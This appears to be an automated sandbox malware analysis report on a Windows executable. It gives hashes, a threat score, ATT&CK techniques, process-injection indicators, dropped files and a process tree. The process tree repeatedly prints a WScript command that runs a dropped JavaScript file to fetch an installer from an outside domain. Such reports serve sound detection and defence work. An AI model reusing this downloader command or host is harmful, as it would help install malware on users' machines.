735a9f187d0023b812d09fe6db129ed9b9446c989db95487cbcb37750bb7f963

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
17/06/2024, 03:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe
Size

184KB
MD5

b6a12a4f392f80d92c72735f94f1bf9f
SHA1

61ee2f85081e25c51c397efa1ca1d2342d7a9b40
SHA256

735a9f187d0023b812d09fe6db129ed9b9446c989db95487cbcb37750bb7f963
SHA512

dca3e2fe20f50fce084b3c0de753106556e65169933a58c4a8baef8176d27e11ac5efee3aa5ecc69dc7630df640f9ea255dd5554005768554883d292ce89ca4b
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3bo:/7BSH8zUB+nGESaaRvoB7FJNndnKo

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2796	WScript.exe
8	2796	WScript.exe
10	2796	WScript.exe
12	2476	WScript.exe
13	2476	WScript.exe
15	112	WScript.exe
16	112	WScript.exe
18	1356	WScript.exe
19	1356	WScript.exe
22	2928	WScript.exe
23	2928	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2964 wrote to memory of 2796	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	28
PID 2964 wrote to memory of 2796	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	28
PID 2964 wrote to memory of 2796	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	28
PID 2964 wrote to memory of 2796	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	28
PID 2964 wrote to memory of 2476	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	30
PID 2964 wrote to memory of 2476	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	30
PID 2964 wrote to memory of 2476	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	30
PID 2964 wrote to memory of 2476	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	30
PID 2964 wrote to memory of 112	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	32
PID 2964 wrote to memory of 112	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	32
PID 2964 wrote to memory of 112	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	32
PID 2964 wrote to memory of 112	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	32
PID 2964 wrote to memory of 1356	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	34
PID 2964 wrote to memory of 1356	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	34
PID 2964 wrote to memory of 1356	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	34
PID 2964 wrote to memory of 1356	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	34
PID 2964 wrote to memory of 2928	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	36
PID 2964 wrote to memory of 2928	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	36
PID 2964 wrote to memory of 2928	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	36
PID 2964 wrote to memory of 2928	2964	b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\b6a12a4f392f80d92c72735f94f1bf9f_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2964
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1813.js" http://www.djapp.info/?domain=NPbRgURbAV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1813.exe
  2⤵
  - Blocklisted process makes network request
  PID:2796
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1813.js" http://www.djapp.info/?domain=NPbRgURbAV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1813.exe
  2⤵
  - Blocklisted process makes network request
  PID:2476
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1813.js" http://www.djapp.info/?domain=NPbRgURbAV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1813.exe
  2⤵
  - Blocklisted process makes network request
  PID:112
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1813.js" http://www.djapp.info/?domain=NPbRgURbAV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1813.exe
  2⤵
  - Blocklisted process makes network request
  PID:1356
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1813.js" http://www.djapp.info/?domain=NPbRgURbAV.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1813.exe
  2⤵
  - Blocklisted process makes network request
  PID:2928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
5f30fa3876d513d577b8b87444063f7d

SHA1
02f5cc2f1f998372911668ff3c96b0eee50c20fd

SHA256
484f2385103966bb5eb74341f53a613d28f85fb6d8b38522f96012974cf3be0b

SHA512
67515612fffcef5101e140374affea6d3694fec60f3043465adca8ca523bb0fa5e4c8e77d602efa0d0e0a5332df7f4a9f3700461875e0b7e71c0543c64b47324

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
a6d5d137162befcbd97bfd3755fec034

SHA1
04fa393db2f9ee987b01673871e9646624357534

SHA256
1f65f718accd2d2d8665522452ba3e4a44b011399f73ee0fb19a67ada5bdad12

SHA512
caa07a8eb8d647f9db690bf75d73408ef64ca83753ba547b6ac811cfc23d551768c15b350b882e9000154c13f55cc1433aeaf5c690e4a13cba5174a25093106b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fb2809427a52573c1acaf560533e1e94

SHA1
100395ed26223ed499f96863269bb6e501dbdbff

SHA256
f3faf3dce027a5be1bca8849818f2bad491699174c0f2a797a3225b3cb65750b

SHA512
a43e462b1a282cf964ace443ad6b7fcea4f96a07432790b0aab42be82427579577d7ec983c9697ed12ec199631d0bde682ea4a1d995f27ce0402b6552c766d0e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
d84d68601c6b019ae7c4081e600b722e

SHA1
c9feebea79bccd66888c5c3dff8de75226da7dac

SHA256
7571f9ccc6f41f7487c381b38e8ba94210c2fcbec9207448afb59c188e393097

SHA512
a014f2f44b7287f6aa50dee68b03579ff5b0fbcae7fe68aa9de66e4a29195248b02898670e245f88fb9a4ed468dec1f41d37fa00186fb517578a420bfded2797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DODQ7AEY\domain_profile[1].htm

Filesize
6KB

MD5
e6b20beef6d611fe0a4052c1aa9f5d25

SHA1
3c5a7d40a9cdb8fa03a50697629e8f3bdd89fe11

SHA256
306a476cf62089c291ab1970d5837f03e5d3931401452db4bda5115268b3285f

SHA512
f14cac2cccc846ebe23f39d37b6931c7bdf4b7da46655366a17cf94e9ff5b65fea0fa17ec631cbf737fdf9bd356a9735eab2e8db3ab83b9706c255ceb1ebb82c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DODQ7AEY\domain_profile[1].htm

Filesize
6KB

MD5
af24f97a2a002253cdec0548afe33ec5

SHA1
b3d52ee3058e50e6cded3cd18435a5e67918dd71

SHA256
e41a1e178988c95ae0b99e65115592dc009d63c2cb956a4f57b43a2b4ff27a69

SHA512
b74d94ee4f5cd2e54c0f29dcd78c84fa73542afd821abb6c06dfaece5ffd4a943109ee60edb823b86084bc84da7327659b7633f1fb5569ed33ef03325a591a36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M0DW1CQS\domain_profile[1].htm

Filesize
40KB

MD5
032f536897ade38e2e27ecaaa8ae6c4e

SHA1
438ce6c2d68eb605ebcff5161fec1b74af4b7540

SHA256
6f525b7efcc77d77622bfb2a69b22e71d1d88ca7813210ac3b1ecbd5dab64d6d

SHA512
4055fa954a636c9aafc68e1b7ba3c8f1785e7a7c77425a773531bb0a3e6f2112fef10d1b68ed5fcaa971e98c34012218f271e290864012435bff95ce46a3fb1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M0DW1CQS\domain_profile[1].htm

Filesize
40KB

MD5
c5c5376946f7307e1e5834c96fccb607

SHA1
f5e2b974b166b7b592a8c8634c28f565252fdfa0

SHA256
5184f6aca60a5483db6d872b03da1e8917fd0f0cf78ba2bf9229e20c3086c156

SHA512
3e4ab41edbd8d1ed73382ebfac84cf60c61e76cac14c54f49e7731bc3a63592622108827508c7941bc0acff02064b9e9433672233b5fdd42e285d4194b52650a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab47CA.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5FFC.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf1813.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\G7FAPW3U.txt

Filesize
175B

MD5
e20052f66014cf084c72c10a18a22e27

SHA1
57ca92527687feed72f53d82f58ed841967988db

SHA256
ee8c7c43f136f48a0a222a8018a0eaa79628f1e9d8a7fb281ea9ebde8597cc82

SHA512
6c113bfe713f01f936e6eea9f3f408efebb805e6fa6759be48f2e3d061b60a441c94086d634f65c7fe13987697982bdbe94ed123a89f65d5eaf80d1e96ca9caa

Download Submit